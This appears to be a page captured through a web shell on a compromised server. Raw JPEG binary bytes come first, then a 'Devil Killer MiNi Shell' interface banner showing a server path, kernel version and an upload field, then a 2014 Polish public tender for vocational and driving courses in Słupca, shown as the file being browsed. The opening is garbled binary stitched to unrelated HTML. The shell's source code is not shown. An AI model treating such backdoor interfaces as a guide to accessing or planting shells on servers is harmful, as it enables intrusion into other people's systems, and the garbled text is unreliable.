JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140903/293624-N-2014.html

<p class="kh_header"><b>Słupca: Zorganizowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla rodziców zastępczych, wychowanków rodzin zastępczych i wychowanków placówki opiekuńczo-wychowawczej oraz osób bezrobotnych w ramach zadania Aktywna Integracja dla uczestników projektu Lepsze Jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 293624 - 2014; data zamieszczenia: 03.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Wojska Polskiego 13, 62-400 Słupca, woj. wielkopolskie, tel. 63 213 22 44; 63 277 14 43, faks 63 213 22 45.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla rodziców zastępczych, wychowanków rodzin zastępczych i wychowanków placówki opiekuńczo-wychowawczej oraz osób bezrobotnych w ramach zadania Aktywna Integracja dla uczestników projektu Lepsze Jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla rodziców zastępczych, wychowanków rodzin zastępczych i wychowanków placówki opiekuńczo-wychowawczej oraz osób bezrobotnych w ramach zadania Aktywna Integracja dla uczestników projektu Lepsze Jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.Przedmiot zamówienia jest podzielony na  4 części:CZĘŚĆ I:Przedmiot zamówienia:  przygotowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla 13 osób, w tym 9 rodziców zastępczych, 2 wychowanków rodzin zastępczych i 2 wychowanków placówki opiekuńczo-wychowawczej skierowanych przez Powiatowe Centrum Pomocy Rodzinie w Słupcy.CZĘŚĆ II: Przedmiot zamówienia:  przygotowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla 27 osób, w tym 12 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy i 15 osób  skierowanych przez Miejski  Ośrodek Pomocy Społecznej w Słupcy.CZĘŚĆ III: Przedmiot zamówienia:  przygotowanie i przeprowadzenie kursu prawa jazdy kat. B  dla 11 osób, w tym 2 rodziców zastępczych skierowanych przez Powiatowe Centrum Pomocy Rodzinie w Słupcy, 4 uczestników skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy  oraz 5 uczestników skierowanych przez Miejski Ośrodek Pomocy Społecznej w Słupcy. CZĘŚĆ IV: Przedmiot zamówienia:  przygotowanie i przeprowadzenie kursu obsługi wózków jezdniowych dla 5 osób, skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 1 ustawy oraz spełniający szczegółowe warunki udziału w postępowaniu, tj.: Wykonawca ubiegający się o udzielenie zamówienia publicznego musi posiadać aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzkie Urzędy Pracy zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013r. poz. 674 ze zm.). Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o posiadaniu aktualnego wpisu do RIS na podstawie Załącznika nr 4 do SIWZ. Zamawiający dokona weryfikacji posiadania ww. wpisu w formie elektronicznej na stronie www.ris.praca.gov.pl. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o: a) oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych (załącznik nr 4 do SIWZ), b) oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 pkt 1 Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 Ustawy oraz szczegółowe warunki udziału w postępowaniu, tj.: a)Dla części I: Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że zrealizował w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 usługi polegające na zorganizowaniu i przeprowadzeniu kursów zawodowych/motywacyjnych.b)Dla części II:Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że zrealizował w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 usługi polegające na zorganizowaniu i przeprowadzeniu kursów zawodowych/motywacyjnych.c)Dla części III:Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że zrealizował w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 usługi polegające na zorganizowaniu i przeprowadzeniu kursu prawa jazdy kat.B. d)Dla części IV:Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że zrealizował w ciągu ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 usługi polegające na zorganizowaniu i przeprowadzeniu kursu obsługi wózków jezdniowych. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte w: a) wykazie wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (zgodnie z Załącznikiem Nr 5 do SIWZ) oraz w załączonych dokumentach potwierdzających, że usługi te zostały wykonane należycie, b) oświadczeniu o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 pkt 2 ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 Ustawy. Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych, których spełnienie Wykonawca zobowiązany jest udokumentować.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy oraz szczegółowe warunki udziału w postępowaniu, tj.: Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że dysponuje osobami posiadającymi uprawnienia do wykonania przedmiotu zamówienia publicznego na podstawie Załącznika nr 6 do SIWZ. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o: a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 6 do SIWZ), b) oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 pkt 3 Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 4 ustawy oraz szczegółowe warunki udziału w postępowaniu, tj.:Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że podlega ubezpieczeniu od odpowiedzialności cywilnej w zakresie prowadzonej działalności, co potwierdzone zostanie polisą ubezpieczeniową (wraz z dowodem zapłacenia wymaganej składki bądź raty składki ubezpieczeniowej), a w przypadku jej braku innym dokumentem potwierdzającym posiadanie ubezpieczenia odpowiedzialności cywilnej w powyższym zakresie. Ocena spełniania warunku udziału w postępowaniu zostanie dokonana w oparciu o: a) polisę ubezpieczeniową (wraz z dowodem zapłacenia wymaganej składki bądź raty składki ubezpieczeniowej), a w przypadku jej braku inny dokument potwierdzający posiadanie ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności, b) oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 pkt 4 Ustawy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty (wg załącznika nr 1 do SIWZ), 2. pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik, 3. oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1-4 Ustawy (sporządzone według wzoru stanowiącego Załącznik nr 2 do SIWZ), 4. Oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych (sporządzone według wzoru stanowiącego Załącznik nr 4 do SIWZ), 5. Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (tylko, jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach na określonych warunkach:1)zmiany danych Wykonawcy lub Zamawiającego bez zmiany samych stron umowy (zmiana siedziby, adresu, nazwy, numeru rachunku bankowego, osób reprezentujących strony umowy ) w przypadku zaistnienia wymienionych wyżej zmian po danej stronie umowy,2)zmiany przedstawicieli reprezentujących Zamawiającego lub Wykonawcę podczas realizacji umowy w przypadkach: śmierci, choroby lub innych zdarzeń losowych wymienionych wyżej osób, jeżeli zmiana wymienionych wyżej osób okaże się konieczna z jakichkolwiek innych przyczyn niezależnych od stron, 3)zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia - zmiana osoby musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy osoba wskazana przez Wykonawcę będzie posiadała doświadczenie i kwalifikacje odpowiadające co najmniej doświadczeniu i kwalifikacjom osoby wymienionej w ofercie, 4)zmiana miejsca wykonania zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz pod warunkiem, 5)zmiana terminu wykonania zamówienia, który może ulec zmianie w przypadku wystąpienia okoliczności niezależnych od Stron umowy z powodu których wykonanie umowy nie będzie możliwe w ustalonym terminie, 6)zmniejszenie liczby uczestników szkolenia z powodu: a)rezygnacji uczestnika z udziału w zadaniu pomimo wcześniejszej deklaracji o uczestnictwie, b)niemożliwości uczestnictwa w zadaniu uczestnika projektu (np. choroba, zdarzenie losowe uniemożliwiające korzystanie z zadania), c)przerwania uczestnictwa w zadaniu (np. choroba, zdarzenie losowe uniemożliwiające korzystanie z zadania, rezygnacja), 7)zmiana wysokości wynagrodzenia pod warunkiem, że zmiana ta nie doprowadzi do podwyższenia wynagrodzenia Wykonawcy - zgodnie z § 8 umowy, 8)zmiana kosztu osobogodziny kursu pod warunkiem, że nastąpiły okoliczności, których nie można było przewidzieć w chwili podpisania umowy i pod warunkiem, że zmiana ta nie doprowadzi do podwyższenia wynagrodzenia Wykonawcy, 9)zmiana terminu płatności, który uzależniony będzie od terminu przekazywania środków finansowych przez Instytucję Zarządzającą; 10)okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dostosowana do zaistniałych okoliczności, 11)dopuszczalna jest zmiana numeru rachunku bankowego wykonawcy, podanego w umowie, w przypadku zmiany rachunku bankowego wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia, 12)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia; 13)konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie; 14)konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości 15)wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprslupca.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Słupcy, ul. Wojska Polskiego 13, 62-400 Słupca, woj. wielkopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Słupcy, ul. Wojska Polskiego 13, 62-400 Słupca, III piętro, pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Lepsze Jutro współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 - Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 - Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przygotowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla 13 osób, w tym 9 rodziców zastępczych, 2 wychowanków rodzin zastępczych i 2 wychowanków placówki opiekuńczo-wychowawczej skierowanych przez Powiatowe Centrum Pomocy Rodzinie w Słupcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przygotowanie i przeprowadzenie kursu pierwszej pomocy dla 10 osób, w tym 8 rodziców zastępczych i 2 wychowanków rodzin zastępczych, którego celem jest zdobycie wiedzy oraz praktycznych umiejętności do udzielenia pierwszej pomocy przedmedycznej w najbardziej typowych sytuacjach z życia codziennego. Zakres zajęć powinien obejmować:Zagadnienia nieurazowe oraz Postępowanie z poszkodowanym po urazie 2. Przygotowanie i przeprowadzenie kursu wizażu dla 7 osób, w tym 5 rodziców zastępczych i 2 wychowanków placówki opiekuńczo-wychowawczej. Zakres zajęć: Zajęcia teoretyczne powinny obejmować wykłady z zakresu: pielęgnacji twarzy pod makijażem,analizy kolorystycznej,rodzajów makijażu (dzienny, koktajlowy, wieczorowy),stylizacji fryzur,Zajęcia praktyczne:
makijaż ((dzienny, koktajlowy, wieczorowy), stylizacja fryzur.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przygotowanie i przeprowadzenie kursów zawodowych/motywacyjnych dla 27 osób, w tym 12 osób skierowanych przez Gminny Ośrodek Pomocy Społecznej w Słupcy i 15 osób  skierowanych przez Miejski  Ośrodek Pomocy Społecznej w Słupcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przygotowanie i przeprowadzenie kursu opiekuna osoby starszej zależnej z podstawą języka niemieckiego dla 10 osób. Zakres zajęć: - rola i zadania opiekuna osób starszych, zależnych, etyka pracy, formy opieki realizowane w ramach systemu opieki zdrowotnej i pomocy społecznej, - zagadnienia gerontologii, niepełnosprawność w aspekcie biologicznym, fizycznym i psychospołecznym, problemy zdrowotne osób zależnych i choroby wieku starszego, - rehabilitacja osób zależnych, zasady żywienia, zasady udzielania pomocy przedmedycznej, techniki wykonywania zabiegów pielęgnacyjnych, - warsztaty pielęgnacyjno-opiekuńcze, - nauka podstaw języka niemieckiego z uwzględnieniem słownictwa i zwrotów związanych z wykonywaniem obowiązków opiekuna osób starszych, zależnych (oferta zgodna z wytycznymi w zakresie kwalifikowania wydatków w ramach POKL). Przewidywana liczba godzin:  130 godzin/os., w tym: 60 godzin języka niemieckiego, 20 godzin teorii, 50 godzin praktyki. 2. Przygotowanie i przeprowadzenie kursu małego biznesu z elementami księgowości dla 14 osób.2)Zakres zajęć: regulacje prawne dla małego biznesu, biznesplan i finansowanie działalności, zakładanie firmy i zarządzanie nią, księgowość, podatki, płace ZUS - zajęcia warsztatowe z wykorzystaniem sprzętu i programów komputerowych,
